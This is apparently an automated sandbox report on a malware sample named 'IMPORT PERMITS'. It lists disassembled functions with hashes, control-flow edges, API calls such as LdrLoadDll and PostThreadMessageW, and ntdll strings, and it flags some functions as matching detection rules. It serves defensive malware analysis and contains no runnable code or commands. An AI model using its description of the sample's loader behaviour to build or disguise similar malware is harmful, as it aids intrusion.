                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: c14c144671b0669951149e36eb0afbb3db3561cd80e68c3629a22689d69b2d4c
                                                                                                                                • Instruction ID: a352bec93e72211b6d0601dad0f5d69ce4cc3f8eddda477f3779edef906361a8
                                                                                                                                • Opcode Fuzzy Hash: c14c144671b0669951149e36eb0afbb3db3561cd80e68c3629a22689d69b2d4c
                                                                                                                                • Instruction Fuzzy Hash: 8390023120148902D1107158840474A401597E4301F59C512B4428659DC7A589927221
                                                                                                                                Function 014235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: aa9a8e4d05ba4f1241fff7493566014b474cf63ddd47ce1ab3194bd76b001fc2
                                                                                                                                • Instruction ID: e48cc2267a0c4edd9f0ac3402002e21ddad27a4ab04effca0472b47c560b2d33
                                                                                                                                • Opcode Fuzzy Hash: aa9a8e4d05ba4f1241fff7493566014b474cf63ddd47ce1ab3194bd76b001fc2
                                                                                                                                • Instruction Fuzzy Hash: 0A90023160550502D10071584514706501597E4201F65C512B0428569DC7A58A5276A2
                                                                                                                                Function 00413C33 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 0-1925500867
                                                                                                                                • Opcode ID: 47fd9a5721cc2d41a5d329880407fccc8c7e371088a6e8040ee7adad596fcbe3
                                                                                                                                • Instruction ID: 9f2dfacd246ee8138d91af8e826e1c003297ad8ed14319375169a2c205286367
                                                                                                                                • Opcode Fuzzy Hash: 47fd9a5721cc2d41a5d329880407fccc8c7e371088a6e8040ee7adad596fcbe3
                                                                                                                                • Instruction Fuzzy Hash: 2B51FE72A04209BFDB119B758C419EFBBBCEF82329B04466EF801A7141E7399E46C7D5
                                                                                                                                Function 00413D62 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108threadwindowCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 53 413d62-413d7f 54 413d81-413d8c 53->54 55 413d39-413d46 53->55 56 413de0-413e3d call 42e4c3 call 42eed3 call 417513 call 404833 call 424bb3 54->56 57 413d8e-413dbb 54->57 58 413d48-413d5d 55->58 59 413dbc 55->59 72 413e5d-413e63 56->72 73 413e3f-413e4e PostThreadMessageW 56->73 57->59 61 413dd5-413dde 58->61 62 413d5f-413d60 58->62 59->61 61->56 73->72 74 413e50-413e5a 73->74 74->72
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00413E4A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 1836367815-1925500867
                                                                                                                                • Opcode ID: 38547fadd0eeb1eca0ba56dcc328b3be3d801d245743f710302a858c74a72467
                                                                                                                                • Instruction ID: 88cd156cdc9bf9b18ebb48484415958f0fac3f013be3a7e7569fbb57ecce6a41
                                                                                                                                • Opcode Fuzzy Hash: 38547fadd0eeb1eca0ba56dcc328b3be3d801d245743f710302a858c74a72467
                                                                                                                                • Instruction Fuzzy Hash: DE31CE72A483487EDF21DAA58C41DDF3BADDE95364F04485EF510AB241D32D8E0347A6
                                                                                                                                Function 00413DD3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60threadwindowCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00413E4A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 1836367815-1925500867
                                                                                                                                • Opcode ID: 140a2741ae280e9859cdea08e10dafceb9e85a622853fca8a359ac55319e03f6
                                                                                                                                • Instruction ID: df9020fcaebf28c8a9af020bf3ba02eab6247f42d2229073ab61c7992f18581a
                                                                                                                                • Opcode Fuzzy Hash: 140a2741ae280e9859cdea08e10dafceb9e85a622853fca8a359ac55319e03f6
                                                                                                                                • Instruction Fuzzy Hash: 6401C871D4021C7ADB10AAE29C81DEF7B7CDF41798F008069FA14A7141D6784E0647A5
                                                                                                                                Function 004175B8 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 345 4175b8-4175bf 346 4175c0-4175c6 345->346 347 4175c7-4175ca 346->347 348 4175cb-4175ce 347->348 349 4175fa 347->349 350 4175cf-4175df 348->350 351 4175fc-417617 349->351 352 41758f-41759d call 42dac3 349->352 356 4175eb-4175f6 350->356 351->346 354 417619-417622 351->354 366 417573-417587 LdrLoadDll 352->366 367 41758a-41758d 352->367 357 417624-417632 354->357 358 41764b-41766d 354->358 356->350 362 4175f8-4175f9 356->362 357->356 359 417634-417636 357->359 360 41766e-417671 358->360 359->360 363 417638 359->363 362->349 363->347 365 41763a-417649 363->365 365->358 368 417672-41767e 365->368 366->367 370 417680-417683 368->370 371 417684-41769b call 42f063 368->371 374 41769d-4176ce call 42f063 call 42b2f3 371->374 375 4176cf-4176ef call 42b2f3 371->375
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 97e9fc485e406106bfb65abad72d185b67487cc7268d4b5fcd9bf310d2ef2faa
                                                                                                                                • Instruction ID: e7387a0c6b8900ed921e961252f047a28a00ebb33bb56b31a01300c40c371c6c
                                                                                                                                • Opcode Fuzzy Hash: 97e9fc485e406106bfb65abad72d185b67487cc7268d4b5fcd9bf310d2ef2faa
                                                                                                                                • Instruction Fuzzy Hash: 0E415C71A49208ABDB11CF68DC82FFA7BB8FF05314F0441AAE9049A641EA39D541CBD5
                                                                                                                                Function 00417506 Relevance: 1.6, APIs: 1, Instructions: 52libraryloaderCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 382 417506-41750d 383 417547-417558 call 42f8a3 382->383 384 41750f-41753c call 42f003 382->384 388 41755d 383->388 389 417542-417550 call 42f603 384->389 390 41753e-417541 384->390 391 417560-417571 call 42dac3 388->391 389->391 398 417552-417557 389->398 396 417573-417587 LdrLoadDll 391->396 397 41758a-41758d 391->397 396->397 398->388 399 417558 call 42f8a3 398->399 399->388
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: fec0760840a81a1cfc29dba25679e0d068e121a6b38d6e3e87c4cfae0b4f1189
                                                                                                                                • Instruction ID: ea26a29338aa88d0d3be55b1328603ceb0725f054a43c19a13f69edbc7379230
                                                                                                                                • Opcode Fuzzy Hash: fec0760840a81a1cfc29dba25679e0d068e121a6b38d6e3e87c4cfae0b4f1189
                                                                                                                                • Instruction Fuzzy Hash: D3019EB1E4410DA7DB10EBA4ED42FDEB7B89B44308F4082AAE91DA7240F235DB188795
                                                                                                                                Function 0041758F Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 415 41758f-41759d call 42dac3 420 417573-417587 LdrLoadDll 415->420 421 41758a-41758d 415->421 420->421
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: faa19c80f4feba2061a74ca3ae79c91efa0461eacaa1439af41494dbf367e914
                                                                                                                                • Instruction ID: ede1850716ebb422ed3c2535a29876ab67790654861e795397d75b07a85b4bc4
                                                                                                                                • Opcode Fuzzy Hash: faa19c80f4feba2061a74ca3ae79c91efa0461eacaa1439af41494dbf367e914
                                                                                                                                • Instruction Fuzzy Hash: 31F0A0B5E0410DBBDB00CA95DC41FEEBB78EF45318F1082A9E90896200E3359A168B91
                                                                                                                                Function 00417593 Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 422 417593-41759d call 42dac3 427 417573-417587 LdrLoadDll 422->427 428 41758a-41758d 422->428 427->428
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: af889453b085852eccb278b9c7a2561df7d0aadd69b1b6e10842e4ddd5654ea4
                                                                                                                                • Instruction ID: bbefeecb9fbd67132910372d0dc99fec3dc364757f9caa88d0980819f192cd57
                                                                                                                                • Opcode Fuzzy Hash: af889453b085852eccb278b9c7a2561df7d0aadd69b1b6e10842e4ddd5654ea4
                                                                                                                                • Instruction Fuzzy Hash: 5FF030B5D0410DBBDB00DA99DC42FABB7B8DB45208F108195F90896240F634EA558BD5
                                                                                                                                Function 0042C6D3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BFC4589,00000007,00000000,00000004,00000000,00416DF9,000000F4), ref: 0042C712
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                • Opcode ID: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                                • Instruction ID: f5cc48ef50bcaa2af9ee5250c1fd3c21de1d36627e9c3385dc6ab60d9e539dbf
                                                                                                                                • Opcode Fuzzy Hash: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                                • Instruction Fuzzy Hash: 47E06DB2600208BBDA10EE59DC41EAB37ACDFC5714F004419F908A7242C670B9118AB8
                                                                                                                                Function 0042C683 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 429 42c683-42c6c7 call 4048c3 call 42d5c3 RtlAllocateHeap
                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(?,0041E2E4,?,?,00000000,?,0041E2E4,?,?,?), ref: 0042C6C2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                • Opcode ID: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                                • Instruction ID: 26b6d175563219739d72d54b8956cc6bc6576853ca31bdfc4a179138117d8d4e
                                                                                                                                • Opcode Fuzzy Hash: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                                • Instruction Fuzzy Hash: E0E06DB66003087BD610EE5ADC45E9B37ACEFC5714F004419FA08A7241D670B9118BB8
                                                                                                                                Function 0042C723 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,E39CA3BE,?,?,E39CA3BE), ref: 0042C75A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 621844428-0
                                                                                                                                • Opcode ID: 2acd5a490768c9832618ef1d028958695b71c0fca5973a16c1d19e88c75f900a
                                                                                                                                • Instruction ID: 907eb8c69ca37f2eb879960a4b276426f7e41c6fb7599df7476c68977caa0473
                                                                                                                                • Opcode Fuzzy Hash: 2acd5a490768c9832618ef1d028958695b71c0fca5973a16c1d19e88c75f900a
                                                                                                                                • Instruction Fuzzy Hash: 3EE08636210618BBD610FB6ADC11F97775CDFC5714F404429FA0867242C6B4BA118BF4
                                                                                                                                Function 01422C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 244ceb41d760cfecd9cf04005f88ad64321317489b22aa31ed4d3a9d0c189b69
                                                                                                                                • Instruction ID: 81534222751e34b2d4763277e5f85b8a3a0cedf6141eb2e07a15a73a542339be
                                                                                                                                • Opcode Fuzzy Hash: 244ceb41d760cfecd9cf04005f88ad64321317489b22aa31ed4d3a9d0c189b69
                                                                                                                                • Instruction Fuzzy Hash: 76B09B719015D5C5DA11F7644608B17791077D0701F55C163E3034753F4778C1D1F275

                                                                                                                                Non-executed Functions

                                                                                                                                Function 01462349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                • Opcode ID: 190219bc3a91ebad2a31e067d88fea31c1ee49e5ae9feed9210c64bcbdba344a
                                                                                                                                • Instruction ID: 58e4187218a43c17be614cb6dfeeea30f44483db6b213f140d1cb1b7131ce367
                                                                                                                                • Opcode Fuzzy Hash: 190219bc3a91ebad2a31e067d88fea31c1ee49e5ae9feed9210c64bcbdba344a
                                                                                                                                • Instruction Fuzzy Hash: 4E926C71604342ABE721DF19C880F6BBBE8BB94758F04492EFA9497361D7B0E845CB53
                                                                                                                                Function 01418620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • 8, xrefs: 014552E3
                                                                                                                                • Invalid debug info address of this critical section, xrefs: 014554B6
                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01455543
                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0145540A, 01455496, 01455519
                                                                                                                                • Critical section address., xrefs: 01455502
                                                                                                                                • Critical section address, xrefs: 01455425, 014554BC, 01455534
                                                                                                                                • undeleted critical section in freed memory, xrefs: 0145542B
                                                                                                                                • Critical section debug info address, xrefs: 0145541F, 0145552E
                                                                                                                                • Thread identifier, xrefs: 0145553A
                                                                                                                                • corrupted critical section, xrefs: 014554C2
                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014554E2
                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014554CE
                                                                                                                                • double initialized or corrupted critical section, xrefs: 01455508
                                                                                                                                • Address of the debug info found in the active list., xrefs: 014554AE, 014554FA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                • Opcode ID: da6a48afc59ccdc8e9fc3779d67978c4d9574f344743af50f313b612091f6e67
                                                                                                                                • Instruction ID: e0c9d8dbba7038f4d17e5e0f9b6dc3bceae00e824c05eb7f7846b1896df60199
                                                                                                                                • Opcode Fuzzy Hash: da6a48afc59ccdc8e9fc3779d67978c4d9574f344743af50f313b612091f6e67
                                                                                                                                • Instruction Fuzzy Hash: 5181AFB1A41359EFDB60CF99C844BAEBBB5BB08B18F10415EF908BB361D375A941CB50
                                                                                                                                Function 014129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01452506
                                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014525EB
                                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01452412
                                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0145261F
                                                                                                                                • @, xrefs: 0145259B
                                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01452624
                                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01452409
                                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014524C0
                                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014522E4
                                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01452602
                                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01452498
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                • API String ID: 0-4009184096
                                                                                                                                • Opcode ID: 72db42c61604017a6c4812ee22af042e00309ddeede0fc0fd3f8ecf8e2496d3a
                                                                                                                                • Instruction ID: 3a0ea6c359e2ceff1197b930ca7c777fb36866527d188f90df639f81dde1f8f4
                                                                                                                                • Opcode Fuzzy Hash: 72db42c61604017a6c4812ee22af042e00309ddeede0fc0fd3f8ecf8e2496d3a
                                                                                                                                • Instruction Fuzzy Hash: C40282B1D002299BDB61DB55CC80F9AB7B8AB54304F0041EBEB09A7252E7B09F85CF59
                                                                                                                                Function 01488B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                • Opcode ID: 1e52e8241b0d6d86c41baa699e2ad07a210da41a9f6484381cbb21f5bdb4c4ad
                                                                                                                                • Instruction ID: 5293308b67d2931b799d69dbc755dba80cf9b7b21fa73d85ee94c079cc6280cb
                                                                                                                                • Opcode Fuzzy Hash: 1e52e8241b0d6d86c41baa699e2ad07a210da41a9f6484381cbb21f5bdb4c4ad
                                                                                                                                • Instruction Fuzzy Hash: 6B51CF755043129BC325EF198884BAFBBE8FFD4344F94491EEA58C32A4E770D609C792
                                                                                                                                Function 01490274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                • API String ID: 0-1700792311
                                                                                                                                • Opcode ID: eff6c32735c578fd7355e10d556945a88082690db752ae8f0c3e11d0e5122b0f
                                                                                                                                • Instruction ID: 6811c3f5609f7d17d0254052a6c2569c9ddcb2310bd4931e0b4795c424f97b28
                                                                                                                                • Opcode Fuzzy Hash: eff6c32735c578fd7355e10d556945a88082690db752ae8f0c3e11d0e5122b0f
                                                                                                                                • Instruction Fuzzy Hash: 9FD1EA32601282DFDF22DF68D440AAEBFF5FF5A718F09805AE5499B762C7349981CB50
                                                                                                                                Function 014689B3 Relevance: 10.3, Strings: 8, Instructions: 259COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • HandleTraces, xrefs: 01468C8F
                                                                                                                                • VerifierDebug, xrefs: 01468CA5
                                                                                                                                • VerifierDlls, xrefs: 01468CBD
                                                                                                                                • x,, xrefs: 01468A35, 01468A5F
                                                                                                                                • VerifierFlags, xrefs: 01468C50
                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01468A67
                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01468A3D
                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01468B8F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags$x,
                                                                                                                                • API String ID: 0-530485203
                                                                                                                                • Opcode ID: 9336bde297e7afa679c770457d5c1b4b8ae36c033a4538f23f0284bb1abf19f1
                                                                                                                                • Instruction ID: 5b709e60df679f665eb67613b90815c22a17c3013aa3fae5ad0c5556bd9e0f7c
                                                                                                                                • Opcode Fuzzy Hash: 9336bde297e7afa679c770457d5c1b4b8ae36c033a4538f23f0284bb1abf19f1
                                                                                                                                • Instruction Fuzzy Hash: B891F3726417139FDB21DF69D890B5B77A8AB64A1CF05041EFA40AF374CB709C058BA3
                                                                                                                                Function 014163FF Relevance: 9.0, Strings: 7, Instructions: 261COMMON
                                                                                                                                Download Yara Rule
